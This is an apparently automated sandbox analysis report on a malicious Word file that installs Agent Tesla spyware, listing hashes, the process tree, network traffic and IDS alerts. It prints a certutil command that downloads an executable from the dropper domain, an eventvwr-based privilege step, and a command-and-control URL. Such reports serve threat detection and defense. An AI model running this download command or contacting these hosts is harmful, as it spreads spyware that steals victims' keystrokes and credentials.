URL: | http://alobitanbd.com/css/Giveaway.doc |
Full analysis: | https://app.any.run/tasks/013d3345-1022-4029-a92d-d72a0154acea |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | April 25, 2019, 08:55:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 733E737F2F381A6029D77EE4865B6C15 |
SHA1: | CD3093BCE99ECBEA62EA6D231B54EE3F9DE8845C |
SHA256: | 0CF2227986C0EDA34AECF817578046CD5E97D78B9E773D6FE04C01EDA755364D |
SSDEEP: | 3:N1KfuQEzUUWKa1KGn:C2QEyAGn |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2308 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3808 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2308 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
1692 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4088 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2672 | "C:\Windows\System32\certutil.exe" -urlcache -split -f http://alobitanbd.com/css/Easter.exe C:\Users\admin\AppData\Local\Temp\upadte.exe | C:\Windows\System32\certutil.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1972 | C:\Users\admin\AppData\Local\Temp\upadte.exe | C:\Users\admin\AppData\Local\Temp\upadte.exe | — | WINWORD.EXE |
User: admin Company: HappyOrNot Integrity Level: MEDIUM Description: K&R Transporte Exit code: 0 Version: 5.6.14.17 | ||||
2336 | "C:\Users\admin\AppData\Local\Temp\upadte.exe" | C:\Users\admin\AppData\Local\Temp\upadte.exe | upadte.exe | |
User: admin Company: HappyOrNot Integrity Level: MEDIUM Description: K&R Transporte Version: 5.6.14.17 | ||||
1952 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | — | upadte.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1684 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | upadte.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2756 | "C:\Users\admin\AppData\Local\Temp\upadte.exe" | C:\Users\admin\AppData\Local\Temp\upadte.exe | — | eventvwr.exe |
User: admin Company: HappyOrNot Integrity Level: HIGH Description: K&R Transporte Version: 5.6.14.17 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2308 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2308 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8400.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{32EB617C-2111-40F4-8779-C626A530E157} | — | |
MD5:— | SHA256:— | |||
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{2A7E2EA4-7E6C-4BD1-B799-412F583EF9F4} | — | |
MD5:— | SHA256:— | |||
3808 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:053373F0A4E08855E84D506DC305E0AC | SHA256:C253982CC7B0F0605D111C1659F96DD37D70A6F21474B6F93EE4CDE7D00FFD88 | |||
1692 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9DD0EF24-B9CA-4786-BFA0-47020F2C5E14}.FSD | binary | |
MD5:916E3CA30C78057D6C2341CC9C372989 | SHA256:1DF81938F862DACA6857479AC53BC31638139CA6749AFED58C35B80E06290410 | |||
1692 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6B53A73D285C0956B474A05C5D6A1ABD | SHA256:939C3A58B347732C85AABCD631B7EFA72D442DE016CAF0CCB2691E60F57C38C9 | |||
3808 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 | |||
3808 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:195A3FAFA2D32D50291D66CFEF0CBB5D | SHA256:2A2DE509FE9F09F5E9B6894F277C1DC95466090A838E2DA252FF72849EFB8DC8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1692 | WINWORD.EXE | HEAD | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | — | — | suspicious |
1692 | WINWORD.EXE | OPTIONS | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/ | US | — | — | suspicious |
3808 | iexplore.exe | GET | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | document | 18.8 Kb | suspicious |
1692 | WINWORD.EXE | HEAD | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | — | — | suspicious |
972 | svchost.exe | PROPFIND | — | 192.185.77.10:80 | http://alobitanbd.com/css/ | US | — | — | suspicious |
972 | svchost.exe | PROPFIND | — | 192.185.77.10:80 | http://alobitanbd.com/css/ | US | — | — | suspicious |
2336 | upadte.exe | POST | 500 | 185.117.73.142:80 | http://185.117.73.142//inc/298d59738c5d32.php | NL | — | — | malicious |
1692 | WINWORD.EXE | GET | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | document | 18.8 Kb | suspicious |
1692 | WINWORD.EXE | HEAD | 200 | 192.185.77.10:80 | http://alobitanbd.com/css/Giveaway.doc | US | compressed | 18.8 Kb | suspicious |
972 | svchost.exe | PROPFIND | 301 | 192.185.77.10:80 | http://alobitanbd.com/css | US | html | 298 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2308 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2336 | upadte.exe | 185.117.73.142:80 | — | Host Sailor Ltd. | NL | malicious |
2672 | certutil.exe | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
1692 | WINWORD.EXE | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
972 | svchost.exe | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
3808 | iexplore.exe | 192.185.77.10:80 | alobitanbd.com | CyrusOne LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
alobitanbd.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1692 | WINWORD.EXE | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
2672 | certutil.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2672 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
2672 | certutil.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
972 | svchost.exe | Web Application Attack | ET WEB_CLIENT Possible HTTP 405 XSS Attempt (External Source) |
3808 | iexplore.exe | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
2336 | upadte.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla |
2336 | upadte.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla |
2336 | upadte.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla |